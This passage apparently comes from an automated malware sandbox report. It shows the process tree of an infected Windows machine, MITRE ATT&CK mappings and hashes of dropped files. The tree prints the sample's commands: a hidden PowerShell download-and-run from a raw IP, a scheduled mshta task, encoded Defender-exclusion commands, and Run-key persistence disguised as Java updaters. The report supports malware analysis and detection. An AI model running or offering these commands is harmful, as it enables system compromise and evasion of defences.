        10⤵
        Launches sc.exe
        
        PID:3156
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Modifies file permissions
        
        PID:17308
    - - C:\Users\Admin\AppData\Local\Temp\10476550101\94aa2d96c4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476550101\94aa2d96c4.exe"
        5⤵
        
        PID:7008
    - - C:\Users\Admin\AppData\Local\Temp\10476560101\c2804d6277.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476560101\c2804d6277.exe"
        5⤵
        
        PID:24044
    - - C:\Users\Admin\AppData\Local\Temp\10476570101\7d5e50b1df.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476570101\7d5e50b1df.exe"
        5⤵
        
        PID:11660
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 0bXQwma8uVr /tr "mshta C:\Users\Admin\AppData\Local\Temp\LR3SjsEKx.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        
        PID:14968
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 0bXQwma8uVr /tr "mshta C:\Users\Admin\AppData\Local\Temp\LR3SjsEKx.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:17476
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\LR3SjsEKx.hta
        6⤵
        
        PID:15016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RVZCNBYZQUVYFNELSVLFGCPDZL3ONXLU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:17368
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2i0393.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2i0393.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:5664
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:4104
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  PID:4804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:3352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1224 -ip 1224
1⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:15060

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{2fc3435b-4506-4aed-8d41-c2cddb9fb5c2}\df8eb9d6-05ad-4bcb-8947-423be52337e1.cmd"
1⤵
PID:3404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8780
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8920
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9160
- C:\Windows\system32\reg.exe
  reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v df8eb9d6-05ad-4bcb-8947-423be52337e1 /f
  2⤵
  - Modifies registry key
  PID:4584

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
- Executes dropped EXE
PID:9336

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:9348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBNAHAAUAByAGUAZgBlAFIAZQBuAGMAZQAgAC0AZQB4AGMATABVAFMAaQBvAG4AUABBAFQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBPAFIAQwBFADsAIABhAEQARAAtAG0AUABwAFIAZQBGAEUAUgBFAE4AYwBlACAALQBlAFgAYwBsAHUAcwBJAE8AbgBQAFIAbwBDAEUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBmAE8AcgBDAEUA
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:11576

C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
1⤵
- Executes dropped EXE
PID:10568
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
  2⤵
  PID:2580

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:13464

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:1252

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:11756

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:9076

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:14712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\DLq5sdcjrtibokSJ.exe
1⤵
PID:904
- C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\DLq5sdcjrtibokSJ.exe
  C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\DLq5sdcjrtibokSJ.exe
  2⤵
  PID:17640
- - C:\Users\Admin\AppData\Local\Temp\9gX7og1A\DUyEyQwfDM1iWXuY.exe
    C:\Users\Admin\AppData\Local\Temp\9gX7og1A\DUyEyQwfDM1iWXuY.exe 17640
    3⤵
    PID:18020
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 18020 -s 676
      4⤵
      Program crash
      PID:24164
- - C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\ZndNr63h8pNO6Hpv.exe
    C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\ZndNr63h8pNO6Hpv.exe 17640
    3⤵
    PID:10424
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10424 -s 904
      4⤵
      Program crash
      PID:13356
- - C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\ZOQ864pCxy7xCToo.exe
    C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\ZOQ864pCxy7xCToo.exe 17640
    3⤵
    PID:13028
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 13028 -s 988
      4⤵
      Program crash
      PID:17352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 868 -ip 868
1⤵
PID:17556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6512 -ip 6512
1⤵
PID:17568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 18020 -ip 18020
1⤵
PID:23856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe"
1⤵
PID:24100
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
  2⤵
  PID:17672
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    3⤵
    PID:23996
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
      4⤵
      PID:14060
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        5⤵
        
        PID:24392
      - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        6⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        7⤵
        
        PID:11636
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        8⤵
        
        PID:18060
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        9⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_service.exe"
        10⤵
        Modifies registry key
        
        PID:10152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe\"'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:18320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 24404 -ip 24404
1⤵
PID:11032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4344 -ip 4344
1⤵
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 10424 -ip 10424
1⤵
PID:17752

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:18088

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:18292

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:4988

C:\Drivers\pcidrv.exe
C:\Drivers\pcidrv.exe
1⤵
PID:18188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe"
1⤵
PID:1032
- C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
  2⤵
  PID:24348
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
    3⤵
    PID:18420
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
      4⤵
      PID:18180
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        5⤵
        
        PID:9832
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        6⤵
        
        PID:24400

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:12580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 13028 -ip 13028
1⤵
PID:16996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\6ppppzmgdj.exe

Filesize
251KB

MD5
58d3a0d574e37dc90b40603f0658abd2

SHA1
bf5419ce7000113002b8112ace2a9ac35d0dc557

SHA256
dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

SHA512
df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

Download Submit
C:\ProgramData\8ymym7yuk6.exe

Filesize
584KB

MD5
2e56fa5b962d651c073c02467de8e001

SHA1
9667eed96a021d201ac35061bec780fca44a4207

SHA256
cf35a65bf2b0b1aa84c9629e32510475f87502e0c8a2745f4a53d7bdaa5bfd10

SHA512
5ead0d6e435b691ae9276468f2a24096db92cb167f8d03ed0f156f39634f91bf3ffde46b4865ea247e519ff2311f2b241d6ed2bbbe7a632b0ba3335ccfd03274

Download Submit
C:\ProgramData\Wo2n1kSiHHrv

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\hlxtr90h47.exe

Filesize
952KB

MD5
f258ba9ca646b9749d7f22a3dfdc77d2

SHA1
36ee4ef9e49e0ebb8973c8f50849d6367c03e69b

SHA256
fcc3edcd526b0c746998d72af8ce9cc29b0bd801f767078cc472f93d57eee9ef

SHA512
764ecce1c087bceb9dbaab806bce134dae40a0a89a8aa6ab9e566bf2206ca79850cb2a109111455f9c14dbbdb6783193958c9007f7780d444e3837fa7dbdea3a

Download Submit
C:\ProgramData\wlfk6\8gdtrq

Filesize
6KB

MD5
f811947f72e2314a0f9a7478964b3f3b

SHA1
40c2f6eb5868ffd7b331203d66b845de2c972592

SHA256
6b92ffac961728e2c6cd14dfc11ad4f821857957d1d935e64380ffeff8d18a43

SHA512
24a59f162c2416d4739d3c7eb03fcdf8df3b1e31dbef5cde166788cb533179a8aeae51a97be47b8ef5c4b0fc1f048eca30b2d2038e45a680837d7ef438c77d62

Download Submit
C:\ProgramData\wlfk6\9hvsrq90h

Filesize
56KB

MD5
0e2c60740cafa19c5158f4aa41a5d4e7

SHA1
f01d0f359e407fed424c30919ed64b77508b3024

SHA256
ce41f2a3255df2099ae8eea9364bd28c6fd6a56c8ca3290bd274944d16d9e6bf

SHA512
e367b88f1d984f84b9b4a8fa4002ede1afad0d375f9374636250f17e64445a60d1b99fe23a0b314c4b2bd5fd27fe5b87fa4079a84b4497629f238afd8436afe2

Download Submit
C:\ProgramData\wlfk6\db1dje

Filesize
228KB

MD5
8ce704458e632d243a023357eec3702f

SHA1
b4857c6a1e277776b8a08c243917eeae5470aa56

SHA256
257947aba31142bab41ca56915c2ef843c2a156c527dee5d1a07e1224e380aed

SHA512
a96d4aded8fd5ce2cfeeaba2bc69a399006bc723e1aa0777989648b2fe8caa7b6d421744c2bcd52b633d0e2d41b951df2cbc91ac64054c7b8cb63f887b496449

Download Submit
C:\ProgramData\wlfk6\fc2no8yct

Filesize
40KB

MD5
dfd4f60adc85fc874327517efed62ff7

SHA1
f97489afb75bfd5ee52892f37383fbc85aa14a69

SHA256
c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

SHA512
d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

Download Submit
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

Filesize
1.9MB

MD5
bcbec32483eb43840823c4f6bd653779

SHA1
3b83255512c5f268d0a1cb2997b1cc9d40f4252d

SHA256
d8a8e71a2be6d5fafa5d49029a37751c78be7e007152859233b8020a5c258167

SHA512
4cb807157807c72d599305eada37e85330314e43061f9af3ab9c44839bfc945431e320adf5259b9a9ecb531368cd9ab91d047eb8874f0ce6a8d4022ed69a6408

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
71f282b7d8bee7ef97fb56f213dce891

SHA1
04b026d5fec475ce267b12d1e570ccbec2f5d113

SHA256
5c1c496301494cbe5de5039fe4b7b7ee4035fbe1ae032882d72a8e048283c48b

SHA512
0af65a565967c0d3c56a5107084c341448060b34f1187e50bea8ade12d64fdfc96a5006d3373f270f417ebf607ef6a7adb2314177712ed121e76f52ace355b67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\88ecc0f8-6a08-41e1-b900-55f8702fa3bf.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
2e090e7fc88a3407285b82ac10488758

SHA1
a7b3d077c0ce8d010c256e1764d65a8365e21c7d

SHA256
bbcf6e4fb2e172c4d7e2378dfb670be27f97f03e197c35de24580e32013fcedd

SHA512
9ba63a9b71c218ce196e5ccc5e68dfe7310f2ea8989a5174cc7758e19b80905c2e8c943d769e92e3e41fce1746f29cfcee1020340a879fecf34f9d7f90ef3d4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
682ff716e69471147f7a0e231efe86ac

SHA1
937de827ecedfb18ed3f399ac647f88f2579c6bb

SHA256
11e566a5d7934e7f13ddb561000aafff386430a3df22a36424f2101e9ba76662

SHA512
4fffcccf9a78aed772e46ff48f817d586934c8d46434535d25b080c4fa264e018e6c2fe389d8d42b1f3b911e402abbf00affd9b890b77ae68d7074a31ee3e93e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
9ad98a7816a7cb7f7d08e6c472343743

SHA1
757115f3ef7cc916df6d105672d97f53d439d2f7

SHA256
edde0870c0ce6959a79e1d4a18778ba0525987ec6ed5ac7453d415a396d7127f

SHA512
69c35f23ae3bbae6fb5a7e67c2057b89360e1a059bbca9890af9c48e12644c32e2e646f07951a412c9e22870d5351b5ae9b271c2af1941057ad0e886fa5a5fc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
327B

MD5
42d6ac83197a3be9ed6c7e6cff8ce6c4

SHA1
6ac3558e942f52713398c8e7c22867408ea9a5d9

SHA256
536e586a04ac7542103636d343333cdb06d70eaa8c5b2c52c3478303aa32b0ba

SHA512
d9a1a6c612105813b018f618c88a111b9b2c565b81feeebc4d222a44548388d56bb4418ed8884a921086b5f3a2686f3235241f9925417a2443e30e4c86c708b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
54e0889d0d1604692b4802b99df1701b

SHA1
a59fb093a08547b2fd4f594ddfa56cc08e7180fd

SHA256
fee40ca9b5c338d4ff652bef6ffa8e75fea953176423aa4aa7dfce6892209579

SHA512
2364c6e307adcddc9ce9812f1a57a357872c316bdf015d0f77d8f4826b53427f6c86b57ca2864b01f44c52b939e106480037b3ab2783bc7e7ee24c76622f8450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\56TUC5VI\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8828b7af408c493b61d202efaa1a7b7e

SHA1
3128d64e204da82e0f343cf35d172e08f25d56b8

SHA256
6e39fb51d5108d7c7d122e157107d920272d1ca6aa22b60483be42a18d3a88cc

SHA512
cd08578a85faf2db71748414066bf530b69648e99835448428fdacf18bd498f8fe1bf8979152e5664e754753a4045a95ff85758c2ac31f4653276c3ad1b7df6f

Download Submit
